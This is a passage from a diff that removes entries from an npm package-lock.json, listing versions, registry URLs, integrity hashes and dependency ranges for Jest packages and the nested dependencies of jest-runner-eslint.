"https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", - "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", - "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", - "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", - "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.6.3", - "jest-snapshot": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", - "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/environment": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-leak-detector": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-resolve": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-util": "^29.7.0", - "jest-watcher": "^29.7.0", - "jest-worker": "^29.7.0", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner-eslint": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/jest-runner-eslint/-/jest-runner-eslint-2.2.1.tgz", - "integrity": "sha512-BSAB65hGhtr/Kmb7tSkfqFmK9LYwCMK8L1xcp+XaSToPFqr7sY1jleMZUeDhV0ITA33pW+JUCx5a02veVD2Q2w==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "cosmiconfig": "^7.0.0", - "create-jest-runner": "^0.11.2", - "dot-prop": "^6.0.1" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "eslint": "^7 || ^8", - "jest": "^27 || ^28 || ^29" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/console": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-28.1.3.tgz", - "integrity": "sha512-QPAkP5EwKdK/bxIr6C1I4Vs0rm2nHiANzj/Z5X2JQkrZo6IqvC4ldZ9K95tF0HdidhA8Bo6egxSzUFPYKcEXLw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3", - "slash": "^3.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/environment": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-28.1.3.tgz", - "integrity": "sha512-1bf40cMFTEkKyEf585R9Iz1WayDjHoHqvts0XFYEqyKM3cFWDpeMoqKKTAF9LSYQModPUlh8FKptoM2YcMWAXA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/fake-timers": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "jest-mock": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/expect": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-28.1.3.tgz", - "integrity": "sha512-lzc8CpUbSoE4dqT0U+g1qODQjBRHPpCPXissXD4mS9+sWQdmmpeJ9zSH1rS1HEkrsMN0fb7nKrJ9giAR1d3wBw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "expect": "^28.1.3", - "jest-snapshot": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/expect-utils": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-28.1.3.tgz", - "integrity": "sha512-wvbi9LUrHJLn3NlDW6wF2hvIMtd4JUl2QNVrjq+IBSHirgfrR3o9RnVtxzdEGO2n9JyIWwHnLfby5KzqBGg2YA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "jest-get-type": "^28.0.2" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/fake-timers": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-28.1.3.tgz", - "integrity": "sha512-D/wOkL2POHv52h+ok5Oj/1gOG9HSywdoPtFsRCUmlCILXNn5eIWmcnd3DIiWlJnpGvQtmajqBP95Ei0EimxfLw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@sinonjs/fake-timers": "^9.1.2", - "@types/node": "*", - "jest-message-util": "^28.1.3", - "jest-mock": "^28.1.3", - "jest-util": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/globals": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-28.1.3.tgz", - "integrity": "sha512-XFU4P4phyryCXu1pbcqMO0GSQcYe1IsalYCDzRNyhetyeyxMcIxa11qPNDpVNLeretItNqEmYYQn1UYz/5x1NA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/environment": "^28.1.3", - "@jest/expect": "^28.1.3", - "@jest/types": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/schemas": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-28.1.3.tgz", - "integrity": "sha512-/l/VWsdt/aBXgjshLWOFyFt3IVdYypu5y2Wn2rOO1un6nkqIn8SLXzgIMYXFyYsRWDyF5EthmKJMIdJvk08grg==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@sinclair/typebox": "^0.24.1" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/source-map": { - "version": "28.1.2", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-28.1.2.tgz", - "integrity": "sha512-cV8Lx3BeStJb8ipPHnqVw/IM2VCMWO3crWZzYodSIkxXnRcXJipCdx1JCK0K5MsJJouZQTH73mzf4vgxRaH9ww==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.13", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/test-result": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-28.1.3.tgz", - "integrity": "sha512-kZAkxnSE+FqE8YjW8gNuoVkkC9I7S1qmenl8sGcDOLropASP+BkcGKwhXoyqQuGOGeYY0y/ixjrd/iERpEXHNg==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/console": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/transform": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-28.1.3.tgz", - "integrity": "sha512-u5dT5di+oFI6hfcLOHGTAfmUxFRrjK+vnaP0kkVow9Md/M7V/MxqQMOz/VV25UZO8pzeA9PjfTpOu6BDuwSPQA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^28.1.3", - "@jridgewell/trace-mapping": "^0.3.13", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^1.4.0", - "fast-json-stable-stringify": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-regex-util": "^28.0.2", - "jest-util": "^28.1.3", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.1" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/types": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-28.1.3.tgz", - "integrity": "sha512-RyjiyMUZrKz/c+zlMFO1pm70DcIlST8AeWTkoUdZevew44wcNZQHsEVOiCVtgVnlFFD82FPaXycys58cf2muVQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/schemas": "^28.1.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@sinclair/typebox": { - "version": "0.24.51", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.24.51.tgz", - "integrity": "sha512-1P1OROm/rdubP5aFDSZQILU0vrLCJ4fvHt6EoqHEM+2D/G5MK3bIaymUKLit8Js9gbns5UyJnkP/TZROLw4tUA==", - "dev": true, - "optional": true, - "peer": true - }, - "node_modules/jest-runner-eslint/node_modules/@sinonjs/commons": { - "version": "1.8.6", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-1.8.6.tgz", - "integrity": "sha512-Ky+XkAkqPZSm3NLBeUng77EBQl3cmeJhITaGHdYH8kjVB+aun3S4XBRti2zt17mtt0mIUDiNxYeoJm6drVvBJQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/jest-runner-eslint/node_modules/@sinonjs/fake-timers": { - "version": "9.1.2", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-9.1.2.tgz", - "integrity": "sha512-BPS4ynJW/o92PUR4wgriz2Ud5gpST5vz6GQfMixEDK0Z8ZCUv2M7SkBLykH56T++Xs+8ln9zTGbOvNGIe02/jw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@sinonjs/commons": "^1.7.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/jest-runner-eslint/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-runner-eslint/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true, - "optional": true, - "peer": true - }, - "node_modules/jest-runner-eslint/node_modules/create-jest-runner": { - "version": "0.11.2", - "resolved": "https://registry.npmjs.org/create-jest-runner/-/create-jest-runner-0.11.2.tgz", - "integrity": "sha512-6lwspphs4M1PLKV9baBNxHQtWVBPZuDU8kAP4MyrVWa6aEpEcpi2HZeeA6WncwaqgsGNXpP0N2STS7XNM/nHKQ==", - "dev": true, - "dependencies": { - "chalk": "^4.1.0", - "jest-worker": "^28.0.2", - "throat": "^6.0.1" - }, - "bin": { - "create-jest-runner": "generator/index.js" - }, - "peerDependencies": { - "@jest/test-result": "^28.0.0", - "jest-runner": "^28.0.0" - }, - "peerDependenciesMeta": { - "@jest/test-result": { - "optional": true - }, - "jest-runner": { - "optional": true - } - } - }, - "node_modules/jest-runner-eslint/node_modules/diff-sequences": { - "version": "28.1.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-28.1.1.tgz", - "integrity": "sha512-FU0iFaH/E23a+a718l8Qa/19bF9p06kgE0KipMOMadwa3SjnaElKzPaUC0vnibs6/B/9ni97s61mcejk8W1fQw==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/emittery": { - "version": "0.10.2", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.10.2.tgz", - "integrity": "sha512-aITqOwnLanpHLNXZJENbOgjUBeHocD+xsSJmNrjovKBW5HbSpW3d1pEls7GFQPUWXiwG9+0P4GtHfEqC/4M0Iw==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/jest-runner-eslint/node_modules/expect": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/expect/-/expect-28.1.3.tgz", - "integrity": "sha512-eEh0xn8HlsuOBxFgIss+2mX85VAS4Qy3OSkjV7rlBWljtA4oWH37glVGyOZSZvErDT/yBywZdPGwCXuTvSG85g==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/expect-utils": "^28.1.3", - "jest-get-type": "^28.0.2", - "jest-matcher-utils": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-diff": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-28.1.3.tgz", - "integrity": "sha512-8RqP1B/OXzjjTWkqMX67iqgwBVJRgCyKD3L9nq+6ZqJMdvjE8RgHktqZ6jNrkdMT+dJuYNI3rhQpxaz7drJHfw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^28.1.1", - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-docblock": { - "version": "28.1.1", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-28.1.1.tgz", - "integrity": "sha512-3wayBVNiOYx0cwAbl9rwm5kKFP8yHH3d/fkEaL02NPTkDojPtheGB7HZSFY4wzX+DxyrvhXz0KSCVksmCknCuA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-environment-node": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-28.1.3.tgz", - "integrity": "sha512-ugP6XOhEpjAEhGYvp5Xj989ns5cB1K6ZdjBYuS30umT4CQEETaxSiPcZ/E1kFktX4GkrcM4qu07IIlDYX1gp+A==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/environment": "^28.1.3", - "@jest/fake-timers": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "jest-mock": "^28.1.3", - "jest-util": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-get-type": { - "version": "28.0.2", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-28.0.2.tgz", - "integrity": "sha512-ioj2w9/DxSYHfOm5lJKCdcAmPJzQXmbM/Url3rhlghrPvT3tt+7a/+oXc9azkKmLvoiXjtV83bEWqi+vs5nlPA==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-haste-map": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-28.1.3.tgz", - "integrity": "sha512-3S+RQWDXccXDKSWnkHa/dPwt+2qwA8CJzR61w3FoYCvoo3Pn8tvGcysmMF0Bj0EX5RYvAI2EIvC57OmotfdtKA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^28.0.2", - "jest-util": "^28.1.3", - "jest-worker": "^28.1.3", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-leak-detector": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-28.1.3.tgz", - "integrity": "sha512-WFVJhnQsiKtDEo5lG2mM0v40QWnBM+zMdHHyJs8AWZ7J0QZJS59MsyKeJHWhpBZBH32S48FOVvGyOFT1h0DlqA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-matcher-utils": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-28.1.3.tgz", - "integrity": "sha512-kQeJ7qHemKfbzKoGjHHrRKH6atgxMk8Enkk2iPQ3XwO6oE/KYD8lMYOziCkeSB9G4adPM4nR1DE8Tf5JeWH6Bw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^28.1.3", - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-message-util": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-28.1.3.tgz", - "integrity": "sha512-PFdn9Iewbt575zKPf1286Ht9EPoJmYT7P0kY+RibeYZ2XtOr53pDLEFoTWXbd1h4JiGiWpTBC84fc8xMXQMb7g==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^28.1.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^28.1.3", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-mock": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-28.1.3.tgz", - "integrity": "sha512-o3J2jr6dMMWYVH4Lh/NKmDXdosrsJgi4AviS8oXLujcjpCMBb1FMsblDnOXKZKfSiHLxYub1eS0IHuRXsio9eA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@types/node": "*" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-regex-util": { - "version": "28.0.2", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-28.0.2.tgz", - "integrity": "sha512-4s0IgyNIy0y9FK+cjoVYoxamT7Zeo7MhzqRGx7YDYmaQn1wucY9rotiGkBzzcMXTtjrCAP/f7f+E0F7+fxPNdw==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-resolve": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-28.1.3.tgz", - "integrity": "sha512-Z1W3tTjE6QaNI90qo/BJpfnvpxtaFTFw5CDgwpyE/Kz8U/06N1Hjf4ia9quUhCh39qIGWF1ZuxFiBiJQwSEYKQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^28.1.3", - "jest-validate": "^28.1.3", - "resolve": "^1.20.0", - "resolve.exports": "^1.1.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-runner": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-28.1.3.tgz", - "integrity": "sha512-GkMw4D/0USd62OVO0oEgjn23TM+YJa2U2Wu5zz9xsQB1MxWKDOlrnykPxnMsN0tnJllfLPinHTka61u0QhaxBA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/console": "^28.1.3", - "@jest/environment": "^28.1.3", - "@jest/test-result": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.10.2", - "graceful-fs": "^4.2.9", - "jest-docblock": "^28.1.1", - "jest-environment-node": "^28.1.3", - "jest-haste-map": "^28.1.3", - "jest-leak-detector": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-resolve": "^28.1.3", - "jest-runtime": "^28.1.3", - "jest-util": "^28.1.3", - "jest-watcher": "^28.1.3", - "jest-worker": "^28.1.3", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-runtime": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-28.1.3.tgz", - "integrity": "sha512-NU+881ScBQQLc1JHG5eJGU7Ui3kLKrmwCPPtYsJtBykixrM2OhVQlpMmFWJjMyDfdkGgBMNjXCGB/ebzsgNGQw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/environment": "^28.1.3", - "@jest/fake-timers": "^28.1.3", - "@jest/globals": "^28.1.3", - "@jest/source-map": "^28.1.2", - "@jest/test-result": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "execa": "^5.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-mock": "^28.1.3", - "jest-regex-util": "^28.0.2", - "jest-resolve": "^28.1.3", - "jest-snapshot": "^28.1.3", - "jest-util": "^28.1.3", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-snapshot": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-28.1.3.tgz", - "integrity": "sha512-4lzMgtiNlc3DU/8lZfmqxN3AYD6GGLbl+72rdBpXvcV+whX7mDrREzkPdp2RnmfIiWBg1YbuFSkXduF2JcafJg==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/traverse": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/babel__traverse": "^7.0.6", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^28.1.3", - "graceful-fs": "^4.2.9", - "jest-diff": "^28.1.3", - "jest-get-type": "^28.0.2", - "jest-haste-map": "^28.1.3", - "jest-matcher-utils": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3", - "natural-compare": "^1.4.0", - "pretty-format": "^28.1.3", - "semver": "^7.3.5" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-util": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-28.1.3.tgz", - "integrity": "sha512-XdqfpHwpcSRko/C35uLYFM2emRAltIIKZiJ9eAmhjsj0CqZMa0p1ib0R5fWIqGhn1a103DebTbpqIaP1qCQ6tQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-validate": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-28.1.3.tgz", - "integrity": 